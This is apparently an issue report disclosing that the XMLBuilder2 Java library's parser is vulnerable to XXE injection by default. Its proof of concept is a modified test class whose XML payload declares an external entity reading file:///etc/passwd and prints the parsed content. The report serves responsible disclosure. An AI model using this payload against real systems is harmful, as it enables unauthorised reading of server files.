XMLBuilder2 is vulnerable to XML External Entity (XXE) injection #6
Description
I noticed that by default, the parser in XMLBuilder is vulnerable to XXE.
The following PoC is a modified version of the TestXMLBuilder2.java file that would see the local file included in parser output.
package com.jamesmurty.utils;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpressionException;
public class TestXMLBuilder2 extends BaseXMLBuilderTests {
public static final String EXAMPLE_XML_DOC2 = "<?xml version=\"1.0\"?><!DOCTYPE Projects [ <!ELEMENT JetS3t ANY> <!ENTITY xx1 SYSTEM \"file:///etc/passwd\"> ]>" + EXAMPLE_XML_DOC_START + "&xx1;" + EXAMPLE_XML_DOC_END;
@Override
public Class<? extends BaseXMLBuilder> XMLBuilderToTest() throws Exception {
return XMLBuilder2.class;
}
@Override
protected boolean isRuntimeExceptionsOnly() {
return true;
}
// NOTE: No checked exceptions for API calls made in this test method
public void testNoCheckedExceptions() {
XMLBuilder2 builder = XMLBuilder2.create("Blah");
builder = XMLBuilder2.parse(EXAMPLE_XML_DOC2);
builder.stripWhitespaceOnlyTextNodes();
builder.asString();
builder.elementAsString();
builder.xpathQuery("/*", XPathConstants.NODESET);
builder = builder.xpathFind("/Projects");
System.out.println(builder.getElement().getTextContent());
}
public void testExceptionWrappedInXMLBuilderRuntimeException() {
XMLBuilder2 builder = XMLBuilder2.parse(EXAMPLE_XML_DOC2);
try {
builder.xpathFind("/BadPath");
fail("Expected XMLBuilderRuntimeException");
} catch (XMLBuilderRuntimeException e) {
assertEquals(XMLBuilderRuntimeException.class, e.getClass());
Throwable cause = e.getCause();
assertEquals(XPathExpressionException.class, cause.getClass());
assertTrue(cause.getMessage().contains("does not resolve to an Element"));
}
}
}